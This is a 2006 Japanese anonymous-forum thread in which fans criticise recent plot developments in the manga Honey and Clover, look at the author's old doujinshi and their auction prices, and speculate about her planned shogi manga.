馨くんがこんどは自分が、と忍くんのために一肌脱いで修あぼん。
これで森田家の過去話も生きてくるよ。

422 :花と名無しさん:2006/07/17(月) 09:53:45 ID:???0
ホモパロ同人って言っても
別にエロとかはない淡い感じだったらしいよ。
修はぐでかきたかったのは、
そういう性とかじゃない高尚な愛(しかもちょっと禁忌ちっく)なんだろうね。
ひくわw

423 :花と名無しさん:2006/07/17(月) 09:57:16 ID:???0
ウミノさんの同人誌
http://search4.auctions.yahoo.co.jp/jp/search/auc?p=%B1%A9%B3%A4%CC%EE&auccat=2084005146&alocale=0jp&acc=jp

ところで、ウミノさんの同人誌の表紙を見て思ったんだけど
同人時代の頃の絵のほうが
カラーイラストの色の塗り方が綺麗で繊細に見えるな。


424 :花と名無しさん:2006/07/17(月) 09:57:22 ID:???0
9巻以降はハチクロの同人誌だと思って読んでるお

425 :花と名無しさん:2006/07/17(月) 09:59:52 ID:???0
>>422
でも、同人誌でもずっとホモエロなしの
男同士の友情や淡いエロなし愛情みたいなのを
センスのいい絵とセリフ、ポエムで
叙情的に描いてファンがいたウミノさんが
ある日突然、はじけて
ホモホモエロエロウホッな同人誌を描いちゃったんだよね。
それまでのファンもひくくらいの。

それがサイゾーに面白おかしく取り上げられてしまったと。

426 :花と名無しさん:2006/07/17(月) 10:00:50 ID:???0
昔のは知らないけど、今の色鉛筆っぽいカラーが好きだ。

どうでもいいが>>423のAKIRAすげえな。

427 :花と名無しさん:2006/07/17(月) 10:02:31 ID:???0
ハチクロは恋愛話じゃなくって芸術スポ根モノだったんだよ。
「ひろみ・・・テニスなんかやめてよくてよ」なんて言う疲れたお蝶婦人より
宗方コーチとくっつくだろうよ。

しかしこの件で、今まで内面が不明だった森田の精神的成長が描かれて
その末にまた流れが変わるのかもしれんよ?

428 :花と名無しさん:2006/07/17(月) 10:04:36 ID:???0
>>425
読んでて吹いたw

それは本気でひくなぁ・・
修はぐもはじけてエロエロウホッになったらどうしよう。


429 :花と名無しさん:2006/07/17(月) 10:05:18 ID:???0
ウミノ同人誌落札相場

ttp://www.aucfan.com/search1?q=%b1%a9%b3%a4%cc%ee%a1%a1BLUE+on+BLUE&t=-1

羽海野チカ同人誌「BLUE on BLUE」◆SD花藤 1,600 円 6 7月13日
羽海野チカ/BLUEonBLUE 1,600 円 30 7月9日
AKIRA@BLUE on BLUE(羽海野チカ) 1,700 円 6 6月25日
海の近くの遊園地1@BLUE on BLUE(羽海野チカ) 1,100 円 2 6月25日
僕たち男の子@BLUE on BLUE(羽海野チカ) 1,900 円 3 6月25日
今夜はブギー・パック@BLUE on BLUE(羽海野チカ) 820 円 4 6月25日
海の近くの遊園地3@BLUE on BLUE(羽海野チカ) 1,130 円 3 6月25日
バスルームより愛をこめて。@BLUE on BLUE(羽海野チカ) 930 円 8 6月25日
カナリア@BLUE on BLUE(羽海野チカ) 2,100 円 8 6月25日
月とカナリア@BLUE on BLUE(羽海野チカ) 1,100 円 5 6月25日
海の近くの遊園地2@BLUE on BLUE(羽海野チカ) 1,600 円 9 6月24日

430 :花と名無しさん:2006/07/17(月) 10:09:41 ID:???0
成長した竹本がいらなくなったように
ギャグパートを担当できなくなった森田ももういらないから場外行きそう。

431 :花と名無しさん:2006/07/17(月) 10:10:29 ID:???0
>>429
4年位前にハチクロの大ファンになったが
ウミノさんの同人時代の漫画は知らなかったので
ウミノさんの同人誌に興味を持ち、
古本をオークションで買おうとしたら
すごい高い値段がついてて(1冊1万円とかしてた)
こんな高いんならイラネーと買うのやめたんだけど
今はずいぶん値段下がってるんだね。

でも今は、ウミノさんの商業誌の漫画にすら萎えつつあるので
パロ同人誌なんかたとえ100円でも買わないけど。

432 :花と名無しさん:2006/07/17(月) 10:12:08 ID:???0
>>430
そうか・・・そうだな
5巻が一番おもしろかったな

433 :花と名無しさん:2006/07/17(月) 10:12:23 ID:???0
>>429
どれが噂のすごいやつ?
今夜はブギー・パックだと勝手に予想。

同人てどんくらい売れてたんだ?
印刷代とか以外は丸儲けなんでしょ。
かなり儲かってそうでつね。

434 :花と名無しさん:2006/07/17(月) 10:14:29 ID:???0
>>425を勝手に改変しますた

でも、少女漫画誌でもずっとエロなしの
男女の友情や愛情や、淡い親子みたいな愛情みたいなのを
センスのいい絵とセリフ、ポエムで
叙情的に描いてファンがいたウミノさんが
ある日突然、はじけて
ロリロリキモキモドリ厨うへぇなchapter61〜63を描いちゃったんだよね。
それまでのファンもひくくらいの。

それがネラーに祭りにされてしまったと。


435 :花と名無しさん:2006/07/17(月) 10:15:07 ID:???0
スラダン読んでそんな発想が出てくるってすげえな。
この人が描いたメルヘン顔の花道みてえwww

436 :花と名無しさん:2006/07/17(月) 10:16:48 ID:???0
>>434
全米が泣いた

437 :花と名無しさん:2006/07/17(月) 10:17:52 ID:???0
全米が萎えた

438 :花と名無しさん:2006/07/17(月) 10:19:34 ID:???0
要するにたまにハメをはずす奴だから注意して読めって事か

439 :花と名無しさん:2006/07/17(月) 10:19:56 ID:???O
ウミノの同人

440 :花と名無しさん:2006/07/17(月) 10:22:01 ID:MUHsJpKXO
>438
たまにじゃないだろw
設定ぐちゃぐちゃだし、こいつ本当にプロかよ、と思うぞ

たけのこの料理のこととか
パグの両親のこととか
最初は森パグだったのにいきなり臭パグになったり

441 :花と名無しさん:2006/07/17(月) 10:22:18 ID:???0
>>424
これ採用

442 :花と名無しさん:2006/07/17(月) 10:27:15 ID:???0
森田と真山と竹本の新☆三角関係が見れる日も遠くないかもな
                           orz

443 :花と名無しさん:2006/07/17(月) 10:29:05 ID:???0
ぱぐって言い方なんかいいね

444 :花と名無しさん:2006/07/17(月) 10:29:40 ID:???0
似てるよね、パグ犬に。

445 :花と名無しさん:2006/07/17(月) 10:30:08 ID:???0
ウミノ同人誌のブラックジャックの傷ある男って誰だろ??
ttp://page.auctions.yahoo.co.jp/jp/auction/87996268

あと、ウミノって花形×藤間派だったんだね。
ウミノ=ムッツリメガネ君大好き女だから
藤間×花形だとばっかり思ってた。

446 :花と名無しさん:2006/07/17(月) 10:30:11 ID:???0
バグではダメなのね

447 :花と名無しさん:2006/07/17(月) 10:30:17 ID:???O
自分は森田と鮎がそういう関係になるんでは思っている












そうなったらブクオフ逝き&この人の漫画は今後一切買わないがw

448 :花と名無しさん:2006/07/17(月) 10:33:22 ID:???0
ブラックジックじゃないの?
そして名前の順番は関係あんのか。
同人の世界ってわけわからんからスレ違いだしこの話打ち切り。

449 :花と名無しさん:2006/07/17(月) 10:34:48 ID:???0
PAGUMI I LOVE YOU★

450 :花と名無しさん:2006/07/17(月) 10:36:09 ID:???0
しかし、同人の世界を商業誌に持ち込んだのはウミノなわけで。
ウミノが同人の世界でどういうものを描いてたかを知ると
今の糞展開も「そういうのしか描けないプロ失格な女なんだな」と
より深くわかるわけで。
打ち切りとか言って仕切ってる奴ウザい。

451 :花と名無しさん:2006/07/17(月) 10:36:25 ID:???0
>>447
慰めて、とか?それはきついな・・・・・・・
ま、あと数回で終わるらしいから無いと思いますよ☆



452 :花と名無しさん:2006/07/17(月) 10:36:43 ID:???O
>449
マグカップのソレは本当にヒイタ…

453 :花と名無しさん:2006/07/17(月) 10:37:58 ID:???0
ブームってのは興味のない人が手に取ったときに
本格的にはじまって、作品の善し悪しはその時点ではもうどうでも良いことだって
少年漫画の編集者が言っていた記事を思いだした。
出版から映像音楽まで多岐にわたる業界が絡み出したらただただ企画を反対されないように
作家を持ち上げる状態になっちゃったんじゃないかな。

454 :花と名無しさん:2006/07/17(月) 10:39:29 ID:???O
要するに>346だな

455 :花と名無しさん:2006/07/17(月) 10:41:30 ID:???O
映画もアニメも小説化もしたし、ハチクロもそろそろ終わりだし、いきなり爆発して好き勝手やり始めたね、膿の


456 :花と名無しさん:2006/07/17(月) 10:41:54 ID:???0
>>450も正論だが
普通の人は×とか言われても意味がわからないだろうから
>>448のように思うヤツがいるのも当然。
そういう理由で同人について触れるなら、
>>425なんかはわかりやすいが>>445なんかは不親切な描き方だと思う

457 :花と名無しさん:2006/07/17(月) 10:47:12 ID:???O
どこが正論なんだ?
同人なんて見たことないから わからんが
今のあれが同人の世界なのか?
てっきり男と男がラブラブな漫画が同人だと思ってたが


458 :花と名無しさん:2006/07/17(月) 10:47:32 ID:???0
業界が絡みだしたからこそ、
ちゃんと綺麗に終わらせるべきだと思う。
アニメのTなんかかなり森はぐよりに作られてたし、
Uが心配だ・・・

459 :花と名無しさん:2006/07/17(月) 10:49:13 ID:???O
同人とか言わなきゃ認められないんだろ今の展開に
めちゃ可哀想だよねo(^▽^)o
漫画売ればいいのにw
金になるぞ 売っちゃえよ

460 :花と名無しさん:2006/07/17(月) 10:50:13 ID:???0
>>457
ようするに有り得ない展開だろうがなんだろうが好き放題描いてた同人誌のノリを
商業誌で連載するプロになってもひきずってるってことだよ。

461 :花と名無しさん:2006/07/17(月) 10:50:23 ID:???O
ま た 君 か w

462 :花と名無しさん:2006/07/17(月) 10:51:10 ID:???0
>>459
nihongo de ok

463 :花と名無しさん:2006/07/17(月) 10:51:30 ID:???O
>>458
その文章だと森はぐにすればOKって事だな?君は
まかしとけ!!

464 :花と名無しさん:2006/07/17(月) 10:52:33 ID:???O
変なのがまた来たな

465 :花と名無しさん:2006/07/17(月) 10:53:19 ID:???O
>>460
何を今更
最初からずっとじゃんw
少女漫画の同人ノリのテンポ
アホすぎ

466 :花と名無しさん:2006/07/17(月) 10:53:43 ID:???0
コーラスって何日発売?


467 :花と名無しさん:2006/07/17(月) 10:55:51 ID:???0
ケータイ臭ってほんとにいるんだ

468 :花と名無しさん:2006/07/17(月) 10:58:06 ID:???0
>>457
>てっきり男と男がラブラブな漫画が同人

無知なアナタに教えてあげます。
文学のアララギ派みたいに
同好の者同士で本を作ったり
「自費出版」するのが「同人」の意味ですよ。

高橋留美子や藤子不二夫も
自分の漫画の絵やストーリーの力を上げるために
漫画家志望の仲間達と一緒に同人漫画を描いていました。

ホモホモ漫画は、同人全体の一部ですよ。

469 :花と名無しさん:2006/07/17(月) 10:58:56 ID:???0
藤子不二夫→藤子不二雄
に訂正

470 :花と名無しさん:2006/07/17(月) 11:00:15 ID:???0
:???O
  ↑
  ここの部分が太い奴のレスの大半は、
  頭が悪く、クソなことしか書いてない。

これが「携帯臭」。

471 :花と名無しさん:2006/07/17(月) 11:06:31 ID:???0
携帯からの人がみんながみんな頭悪そうなこと言ってるわけではないが
そういう比率が高いことは確かなようですね・・・

というよりさっきからちょっとおかしいやつは同一人物ですね?

472 :花と名無しさん:2006/07/17(月) 11:07:29 ID:???0
携帯臭は、さっきからじゃなくて
ずいぶん前からずっとこのスレに張り付いてるよ。
朝早くから書き込むのが特徴。

473 :花と名無しさん:2006/07/17(月) 11:07:48 ID:???0
さっきからっつか、昨晩からいる

474 :花と名無しさん:2006/07/17(月) 11:09:50 ID:???0
wを多用してる人ね。


475 :花と名無しさん:2006/07/17(月) 11:11:08 ID:???0
359 :花と名無しさん :2006/07/17(月) 01:29:04 ID:???O
>>357
好きじゃないとこのスレにも来ないと思うよ。
だから言葉から悪意とか必要以上に感じて怒らなくて良いよ。2ちゃんだし。

新展開に良いと思うファンも、ついてけなくなるファンも居るのが普通。
どっちが良いも悪いもないさ。




はい、みんなこれをもう一度復習ね。

476 :花と名無しさん:2006/07/17(月) 11:14:48 ID:???O
自分が頭悪い奴なのか心配なんだが
携帯房じゃない人、イタイ人晒してくれお

477 :花と名無しさん:2006/07/17(月) 11:15:14 ID:???0
この人は、青年誌で連載って、いけるのか?
ものすごいコケそうで心配なんだが。

478 :花と名無しさん:2006/07/17(月) 11:16:06 ID:???0
>>475
それは携帯臭じゃなくて、まともな携帯使いだね。

>>473
携帯臭は昨日今日じゃなくて
数ヶ月前から粘着してるよ。
臭×はぐ展開を批判している人が全員同一人物だと思っていたり
全員、森×はぐ厨だと思っているのが特徴。

479 :花と名無しさん:2006/07/17(月) 11:17:41 ID:???0
アフターヌーンみたいな
読者と作者にオタクが多い青年漫画誌なら
メチャクチャで悪い意味で同人臭い漫画を描いても
マンセーされるんじゃないかな?

480 :花と名無しさん:2006/07/17(月) 11:18:36 ID:???0
将棋ねぇ
微妙だなー
小〜中学生が主人公の心温まる話とかが向いてる希ガス

481 :花と名無しさん:2006/07/17(月) 11:20:53 ID:???0
将棋そのものより男同士が指しつ指されつってのが描きたいんだろうな。

482 :花と名無しさん:2006/07/17(月) 11:23:37 ID:???O
ヒカルの碁が描きたいのか…?

483 :花と名無しさん:2006/07/17(月) 11:24:09 ID:???0
>>481
や、やめて〜

この人は一回編集部がしっかりしてる大手の雑誌に行って
鍛えられてきたほうがいいと思う。

484 :花と名無しさん:2006/07/17(月) 11:24:53 ID:???0
>>480
私も羽海野さんは
大人の読者向けの子供が主人公の漫画
(ロリショタ漫画というんじゃなくて
 ジブリアニメの世界みたいな叙情漫画)
が向いてると思うんだけど…。

羽海野さんは、女にとって(=実際は腐女子にとって)
どこか色気が感じられるような
大人の男を描いて、自分で萌えたいんだと思う。
のどぼとけが出てたり手が大きかったりとか
強引に愛してくれる(=実際は単なるストーカー、変態)
性格だったりとか。

485 :花と名無しさん:2006/07/17(月) 11:29:04 ID:???0
ウミノさんの次回作が将棋漫画だときいて
男性風ペンネームを使って女性が少年誌で描いていた
「コマコマ」っていう将棋漫画を思い出したよ。

コマコマは、ストーリーがメチャクチャで
登場人物の性格が変わりすぎで
作者の萌えでつっぱしっていて、変にホモくさくて
ヒカルの碁をうんと劣化させたような漫画だった…。
 
ttp://www.amazon.co.jp/gp/product/4063636046/

486 :花と名無しさん:2006/07/17(月) 11:30:55 ID:???0
>>484
まさにそんな感じだね。
スーツ、とかメガネ、とかタバコとか
本当に自分の萌えに忠実なひとだ。

ジブリっぽいのよさそう。
腐女子趣味さえ抜ければな。

487 :花と名無しさん:2006/07/17(月) 11:31:58 ID:???0
>>485
それなんてウミノ?

488 :花と名無しさん:2006/07/17(月) 11:34:54 ID:???0
つくづく惜しい人だな。
小説とかドラマの漫画化したらいいんジャマイカ

489 :花と名無しさん:2006/07/17(月) 11:42:02 ID:???0
櫻井翔「ハチクロ」全国公開へ
http://headlines.yahoo.co.jp/hl?a=20060715-00000059-nks-ent

490 :花と名無しさん:2006/07/17(月) 11:45:54 ID:???0
囲碁マンガはヒカルの碁があるのに、将棋マンガと言ったら・・・
月下の棋士くらいか・・・あれも一種の変態マンガだよな・・・・

491 :花と名無しさん:2006/07/17(月) 11:46:24 ID:???0
ほんとに将棋漫画やるの?

492 :花と名無しさん:2006/07/17(月) 11:58:36 ID:???0
将棋の名人戦のとき、控え室に取材に現れたらしい。

http://equine.ddo.jp:8080/~takeshi/diary/?m=20060501
>対局2日目、控室に漫画家の羽海野チカさんが来訪した。
>人気少女漫画「ハチミツとクローバー」を執筆中だが、
>それが終わったら将棋を題材にした青少年漫画を書く予定とのことで、
>取材に訪れたもの。新しい将棋ファンの拡大が期待できそうだ。

493 :花と名無しさん:2006/07/17(月) 11:59:48 ID:f+Q+RJrQ0
>>490
月下の棋士はあの作者のマンガでは珍しくちゃんとしてるほうだよ。
一応ゴールがはっきりしてるテーマってのも大きいね。
女性棋士が男のリーグに参戦ってことだろうけど
これって中学生がメジャーリーグ挑戦するみたいなもんだよね。
ふたりっこってドラマでそういう設定あったけど
厳しい世界でウミノさん悩んで書けなくなっちゃわないか心配。

494 :花と名無しさん:2006/07/17(月) 12:03:41 ID:Lx80jQZF0
8ハチ 3ミツだから
森田が8年、はぐが3年のときにくっつくと思ってた

あの日が懐かしい・・・あの日はもどらない・・・

495 :花と名無しさん:2006/07/17(月) 12:15:57 ID:???0
>>493
風邪で高熱に浮かされて、階段で頭を打って
血まみれで対局室に現れる主人公は、まだマトモな方。

コンピュータ占いで「ラッキーカラーはピンク」と出れば、対局室に
全身ピンクづくめのスーツで登場する運命論者のオサーンや、

白装束に剃髪丸坊主と言う、切腹の衣装で現れて、
対局終了と同時に本当に逝ってしまう病身の天才棋士に、

対局中に失禁したり気を失ったりは日常茶飯事、
主人公の人間離れした強さに興奮して勃起して、
しかも最後には本当に射精してしまうホモ神童とか

対局に負けそうになると、現実を受け入れられなくなって
「ああああ、村木夫人!!あなたの肌、あなたのぬくもり!!」
と愛人の事を口走って現実逃避して自滅するマザコン名人とか


・・・・私が変態マンガと言うのは、この辺の事情です。

496 :花と名無しさん:2006/07/17(月) 12:19:53 ID:f+Q+RJrQ0
>>495
いやわかるけどw
この作者マジ他はやばいのばっかだから。

497 :花と名無しさん:2006/07/17(月) 12:21:22 ID:???0
兄や保護者みたいな立場の年上の男と
その男を慕ってる年下の女が
結ばれるストーリーは珍しくないから
結ばれるまでの過程がきちんと描かれていたら
私は全然、臭×はぐに文句はないんだけど
ハチクロの場合は、その過程の描き方があまりに唐突すぎて
納得がいかないよ。

森田とはぐみのいい雰囲気のシーンが続いて
そしていきなりシーンが変わって
森田が臭を4発殴ってきた
(殴り合いのシーンは無し。セリフのみ)とか
もっと殴ればよかったとか
臭にはかなわないとか、いきなり悟ってたり
いきなり、竹本が
俺はダメモトで告白したけどなんで先生は告白しないんだと
臭をたきつけてたりとか
ワケ・ワカ・ラン

498 :花と名無しさん:2006/07/17(月) 12:40:34 ID:???0
たけのこの性格改悪をどうにかしてほしい

499 :花と名無しさん:2006/07/17(月) 12:42:00 ID:f+Q+RJrQ0
>>498
自分探し以来生意気だよな。
マジでこういう奴ムカツク。

500 :花と名無しさん:2006/07/17(月) 12:48:35 ID:???0
上の方で誰かが書いててなるほど!そうだそうだ!と思ったんだけど
森田は竹本に対して友情や愛をちゃんと感じてるけど、竹本はだいたい敵視なんだよね(すべてではないけど)
今月の殴り合いの竹本もちょっと嫌だったなあ。
だから第一期のアニメ最後の竹本告白の笑顔もすごく薄ら寒くてなんか今見ると怖い。

501 :花と名無しさん:2006/07/17(月) 12:48:41 ID:???0
漫画のスレってもともとこんな感じなのかと思ったら、
過去ログみてたら昔はもっとほのぼのしてたんだね。
やっぱり展開に納得行かない人増えたのか。

502 :花と名無しさん:2006/07/17(月) 12:53:39 ID:???0
見切りをつけて去った人も多いよね。
特にダメ押しの「好きさっ」の回で。

503 :花と名無しさん:2006/07/17(月) 12:54:07 ID:???0
>>490
凄いマイナーだし、掲載雑誌が途中からホモ系に移行してしまったけど、一応少女漫画でも
将棋漫画はあったりする
少年☆周波数という奴
割と面白かったな

504 :花と名無しさん:2006/07/17(月) 12:55:24 ID:???0
将棋は腐に人気があるの?

505 :花と名無しさん:2006/07/17(月) 13:00:02 ID:???0
竹本の森田への噛み付きって苦しいのは誰か間違えたくないとか言いつつ
自分が苦しくて八つ当たりって感じなのがもうね・・・。

元々継ぎ目を描かないところはあったけど最近は「想像に任せる」じゃなくて
ただの誤魔化しっぽくみえる。
初期編集みたいに対等な目線で突っ込んでくれる人がいないからこのまま
トリップ神視点マンセーで行きそうだね。('A`)

506 :花と名無しさん:2006/07/17(月) 13:00:28 ID:???0
竹本は、2人の才能への劣等感からはぐみにもう一歩近づけないってころは良かったが
帰ってきてから変な方向に開き直ったな。

507 :401:2006/07/17(月) 13:01:45 ID:???0
うー、なんか朝から特濃なレスばかり…読んでて気持ち悪くなってきた。

>>407
キューコミ時代の担当編集者の小山繭子さん。
ハチクロのカラっとして明るい部分ってのはほとんどこの人が由来なんじゃないかと思ってたり。

羽海野先生はほっとくとウェットで自傷的な話になっちゃうイメージがある。
修の選択も、おっさん浮かれすぎじゃとは思うけど、あれで修もはぐも幸せになるわけじゃあない。
それを選ぶしかなかったみたいな追い詰められ方しちゃってるわけで。

描写不足ってのは確かにそうかもしれんが、展開自体はそんな不自然でもないんだよね。
いかにも羽海野先生らしーキッツイ話ではあるが。

まああれだ。森田はまだ諦めたわけじゃないからな。修はもっと貧乏くじを引く可能性もある。
今が幸せの絶頂だと思って生暖かく見守ってやってもいいんじゃないかと。

508 :花と名無しさん:2006/07/17(月) 13:03:20 ID:???0
今の竹本じゃ振られてもあたりまえだ。
唯一の美点であった「いい奴」要素すらなくなってる。

509 :花と名無しさん:2006/07/17(月) 13:06:05 ID:???0
>>507
最初の一行イラネ。
おまえのレスも気持ち悪くて濃厚だから黙ってろ。

510 :401:2006/07/17(月) 13:07:55 ID:???0
>>509
スマンす。しかし朝っぱらからホモ同人どうのってのは勘弁して欲しかった。
まあ2chだし、言ってもしゃーないんだが。

511 :花と名無しさん:2006/07/17(月) 13:08:54 ID:???0
廃刊になった部数の少ない少女漫画雑誌時代の
ウミノの担当の名字なんて
マニアックなファンしか知らないネタを
説明なしに出す濃ゆい奴が
何ほざいてんだか。
それともウミノ本人か、ウミノのアシスタントか関係者か?

512 :花と名無しさん:2006/07/17(月) 13:08:56 ID:???0
はぐは手が直ったら修ではまた物足りなくなっちゃうんじゃない?

513 :花と名無しさん:2006/07/17(月) 13:09:24 ID:???0
さらにオチがあるとして、
この展開で臭あぼん・・も、あまりにお決まりのパターンだし
そこまでしないと自立できない女に魅力も感じない
自立せずに新たな宿主を探したら神認定

514 :花と名無しさん:2006/07/17(月) 13:09:37 ID:???O
住人は見限って去ったっていうレスをたまにみるが
むしろ加速して増えてね?

515 :花と名無しさん:2006/07/17(月) 13:10:06 ID:???0
「しっ 修ちゃんの事 大スキだけど えっと…でも
これからも親戚っていうか 保護者っていうか
それ以上には…」
「あ…あのっっ 別に保護者が恋人より上とかっ
下とかっ もちろんそゆのんなくってっっ」

と、はぐが頭下げまくるような貧乏くじ引いてくれ

516 :花と名無しさん:2006/07/17(月) 13:11:55 ID:???0
キューコミの頃からハチクロ読んでたけど担当の名前までは知らなかった。
やっぱり401は関係者か
そうでなければ同人時代からの熱烈な追っかけなんだろうなあ。
同人女は、同人やっていない人達に同人のことを少しでも言われると
「私達の世界に部外者が入ってこないで!」と過剰反応するものね。

517 :花と名無しさん:2006/07/17(月) 13:12:01 ID:f+Q+RJrQ0
>>506
そう、竹本のくせにね。
なんか幸せになって欲しくないね。身の程を知らないくせに
花も買えないクズが調子に乗りすぎ。
とくにはぐの介護シュミレーションしてる妄想はウゲっ!
なんで一緒にいる前提なんだよカス!

518 :花と名無しさん:2006/07/17(月) 13:12:16 ID:???0
>>507
それはさすがに深読みしすぎだよ!
ほんとにそのメッセージ込められてたら恐すぎる・・・

「それを選ぶしかなかったみたいな追い詰められ方」をした後の行動としては(恋愛感情を除いて)不自然でないけど
そもそもその前提としてある「それを選ぶしかない追い詰め方」が不自然だった。

とオモタヨ

519 :花と名無しさん:2006/07/17(月) 13:13:03 ID:???0
>>517
・・・何かいやなことあった?

520 :花と名無しさん:2006/07/17(月) 13:14:13 ID:???0
>>515
残された可能性はそれしかないなw

521 :花と名無しさん:2006/07/17(月) 13:14:24 ID:???0
>>516
コンティニューのインタビューで名前出てきてるし本人も一緒にインタビューに参加してたよ。
現担当の立場ないね・・・。

522 :花と名無しさん:2006/07/17(月) 13:14:30 ID:???0
>>517
のび太のくせに生意気だぞ!みたいだよ、それ

523 :花と名無しさん:2006/07/17(月) 13:15:24 ID:???0
前スレにもそんな意見があったような気がするけど
どうせ堕ちるんなら、とことんもっと糞展開になって
読者をもっと呆れさせてくれと思ってる黒い私がいる。
糞展開もきわめれば電波漫画やネタ漫画として笑える。

色々言いたくなってしまうのは
まだハチクロを完全に嫌いになれないからだよ。

524 :花と名無しさん:2006/07/17(月) 13:16:15 ID:???0
>>517
あまりの言いっぷりにワロタw

525 :花と名無しさん:2006/07/17(月) 13:16:27 ID:???0
いっそとどめを、ね。

526 :花と名無しさん:2006/07/17(月) 13:16:57 ID:???0
>>521
羽海野さんが現担当の言うことなんてききませーん。
現担当とじゃ話合わないんだもん。
前担当さんマンセー!!って思ってるのかな。

527 :花と名無しさん:2006/07/17(月) 13:18:44 ID:???0
いい奴・いじられキャラでなくなったたけのこと
ギャグを言ってももはや笑えない森田には
漫画内での存在価値がないね。

528 :401:2006/07/17(月) 13:20:05 ID:???0
>>516
いや、そんな年季の入ったファンではないですよ。
ファンブックのインタビューとか読んでて、ああ、修ちゃんのモデルはこの人なんだろうなー
とか思ってただけですんで。

関係者か…ホントに関係者がいたら話聞いてみたいよな。
羽海野先生は彼らを幸せにする気あるんですか?ってw。

529 :花と名無しさん:2006/07/17(月) 13:21:42 ID:???0
>>527
(´;ω;`)

530 :花と名無しさん:2006/07/17(月) 13:23:41 ID:???0
しっかしいまだに信じられないよ
修はぐなんて、真山×山田以上にありえなすな組み合わせだと思っていたのに
海野さんも今頃にやりかなあ

531 :花と名無しさん:2006/07/17(月) 13:26:24 ID:???0
あんな大事故やのに現場検証もせんと血洗い流しちゃっていいの?
この祭り好き!

532 :花と名無しさん:2006/07/17(月) 13:27:47 ID:???0
しかしまあ、花が買えなくて線路沿いの草むらから花を摘むのは
ちょっと何だかなと思ったよ。
いくら学生でも、3000円のお見舞いくらい出せるだろう。
それくらいの金も惜しんでるようじゃ本気じゃないんだよ、
たけのこの気持ちは。
恋に恋してるだけ。いざ現実の相手に直面するとどうして良いか判らなくなる、
青臭い恋愛ごっこに過ぎないんだと思うんだよ、わたしは。

533 :花と名無しさん:2006/07/17(月) 13:38:21 ID:???O
最近やっと全巻揃えたんだけど、リカと山田の会話以前に、山田と真山が一歳離れてるって設定出てきたっけ?

534 :花と名無しさん:2006/07/17(月) 13:40:40 ID:???0
>532
私はそのときの山田さんの「いいとこいこっか?」にビクッとしたよ。

535 :花と名無しさん:2006/07/17(月) 13:41:21 ID:f+Q+RJrQ0
仕送りもらってバイトしてボロアパートで彼女いないなら
花ぐらい買えるだろ。自動車免許だって1回乗るのに4000円くらいかかるわけだし
こんなときに花さえ買えないクズがはぐと共にいようなんてウザすぎる。
臭はキモチ悪いけどはぐの創作のパートナーって役割はできるし
森田とは両思いでそれも納得。でもタケノコだけはありえん。


536 :花と名無しさん:2006/07/17(月) 13:45:47 ID:???0
正当性を主張するなら一応sageておこうな?

537 :花と名無しさん:2006/07/17(月) 13:56:30 ID:???0
moritaはまだ諦めてないの?
くそっ捨て身かよ、あたりで彼は気持ちよくスッパリ諦めたかと思ってた。
まだ終わりだと思うな発言は、はぐ幸せにしないと取っちゃうよって脅しかと。
そう思ったの自分だけ?

538 :花と名無しさん:2006/07/17(月) 13:59:33 ID:???0
たけのこは告白した時点で諦めがついてて
その後はさりげなく森田の後押しをする役回りかと思ったら
完全に敵対視でつね

539 :花と名無しさん:2006/07/17(月) 14:00:28 ID:???0
作者の好きキャラは異常に粘着質。
どーでもいいやつはあっさりあきらめる。
森田はもちろんおわってる。

540 :花と名無しさん:2006/07/17(月) 14:05:00 ID:???0
とても好かれてるとは思えないタケノコの扱い・・・

541 :花と名無しさん:2006/07/17(月) 14:06:21 ID:???0
>495
変態っていうけど
あの閉鎖された天才集団の中では結構普通にある逸話だよ
いろんな伝説があるし
ただこの作家に将棋の世界を書いて欲しくない

542 :花と名無しさん:2006/07/17(月) 14:06:47 ID:???0
修・森田・たけのこは、正直眼鏡かけたもん勝ちだと思う☆

543 :花と名無しさん:2006/07/17(月) 14:08:09 ID:???0
>>534
自分は、そのときの山田の「そうよ、ここよ!!」てコマで
線路が示されたとき、2人で線路で心中するつもりなのかと思ってしまったよ。

544 :花と名無しさん:2006/07/17(月) 14:14:11 ID:nFLyO+XO0
>>543
どんな鬱展開だよww
やっぱいいとこいこっかはタケノコの野郎エロいこと想像してたに違いない。
このクソガキが!

545 :花と名無しさん:2006/07/17(月) 14:16:31 ID:???0
成長しすぎて食えなくなったたけのこは不人気の極みだね

546 :花と名無しさん:2006/07/17(月) 14:21:58 ID:???0
モブ本のことあんまいじめるなよw


547 :花と名無しさん:2006/07/17(月) 14:23:14 ID:???0
9巻読んだところだけど、
怪我したのは右手だけなんだから
左手とか使って絵を描く練習も始めれば
「もし右手がダメでも大丈夫だ」と思えて
少しはストレスも減るんじゃないかと思った。

548 :花と名無しさん:2006/07/17(月) 14:29:00 ID:???0
激しく遅レスですが、コーラススレでは、ハチクロは死ぬほど
嫌われてますYO。
出て行って欲しいという声が盛ん。付録もウザイらしい。

549 :花と名無しさん:2006/07/17(月) 14:30:15 ID:???0
>>547
「はぐに修ちゃんの手を噛ませる」という萌えエピを
作者がどうしても再現したくて
あえてはぐのストレスを軽減させる手段をとらせなかったのでは

とか言ってみるテスト

550 :花と名無しさん:2006/07/17(月) 14:30:32 ID:???0
>>547
それもさんざんここで言われてきたけど
どうやらウミノタン的には何が何でも右手が治らないと
描けなくなるからダメらしいですよ('A`)

551 :花と名無しさん:2006/07/17(月) 14:30:42 ID:???0
小さいサービスブーケなら1000〜1500円で
可愛いの買えるのにな。ほのぼの感をだそうと必死な展開だと思った。

552 :花と名無しさん:2006/07/17(月) 14:32:23 ID:???0
貧乏で甲斐性無しの竹本はいらないお byばぐ

553 :401:2006/07/17(月) 14:33:49 ID:???0
>>548
浮いてる感は否めんよな。編集部にもドル箱としか思われてない気がする。
まあ、遅くとも年内には終わるんだからもう少し我慢してやってくれ。

554 :花と名無しさん:2006/07/17(月) 14:33:57 ID:???0
>>548
ふろくはわかる気がする。
自分でもウミノクマは(゚听)イラネw

555 :花と名無しさん:2006/07/17(月) 14:36:05 ID:???0
ハチクロというファンタジーに
現実との整合性を求めるのはヤボってもんですお

ね。うみのてんてー

556 :花と名無しさん:2006/07/17(月) 14:37:00 ID:???0
漫画内のキャラ物ならまだわかるけどウミノクマって作者の自画像だろ?
まあどっちにしても雑誌の購入対象年齢から考えても付録はいらないよな。

557 :花と名無しさん:2006/07/17(月) 14:39:52 ID:???0
漫画キャラじゃなくて作者の自画像キャラの付録ってアリなの?
つーか他の雑誌の付録でも見たことないな


558 :花と名無しさん:2006/07/17(月) 14:44:02 ID:???0
>>557 自分も、見たことも聞いたこともない >作者の自画像キャラの付録

しかし集英社もわかりやすい商売をするもんだ…
結果的に自分らの首を絞めないことだな


